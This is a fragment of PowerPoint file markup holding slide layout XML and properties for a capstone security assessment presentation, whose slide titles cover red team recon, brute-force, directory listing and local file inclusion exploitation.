                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1200" b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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100" dirty="0">
              <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Arrow: Down 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C56A530-9712-43F9-BD84-DF4B72948E0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7492642" y="3259803"/>
            <a:ext cx="555414" cy="8961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924BCA2C-B8AF-435F-93E1-EB0EC9E2A36E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7180283" y="2571750"/>
            <a:ext cx="1239442" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Screenshots</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A2BF3E0-463E-4F33-ADF7-1862DBBAFF0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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10796</TotalTime>
  <Words>2653</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>316</Paragraphs>
  <Slides>28</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Bahnschrift Condensed</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Bahnschrift Light SemiCondensed</vt:lpstr>
      <vt:lpstr>Bahnschrift SemiLight Condensed</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Bahnschrift Light Condensed</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System  Richard Brantsch</vt:lpstr>
      <vt:lpstr>Table of Contents </vt:lpstr>
      <vt:lpstr>Network Topology </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Red Team Security Assessment </vt:lpstr>
      <vt:lpstr>Recon: Describing the Target</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Exploitation: Open Port 80 &amp; Directory Listing Enabled </vt:lpstr>
      <vt:lpstr>Exploitation: Open Port 80 &amp; Directory Listing Enabled</vt:lpstr>
      <vt:lpstr>Exploitation: Brute-Force Attack, CWE-307 &amp; Weak Hashed Passwords  </vt:lpstr>
      <vt:lpstr>Exploitation: Brute-Force Attack, CWE-307 &amp; Weak Hashed Passwords  </vt:lpstr>
      <vt:lpstr>Exploitation: Brute-Force Attack, CWE-307 &amp; Weak Hashed Passwords  </vt:lpstr>
      <vt:lpstr>Exploitation: LFI (Local File Inclusion)</vt:lpstr>
      <vt:lpstr>Exploitation: LFI (Local File Inclusion) </vt:lpstr>
      <vt:lpstr>Exploitation: LFI (Local File Inclusion) </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cp:lastModifiedBy>Richard Brantsch</cp:lastModifiedBy>
  <cp:revision>93</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-26T13:01:25Z</dcterms:modified>
</cp:coreProperties>
</file>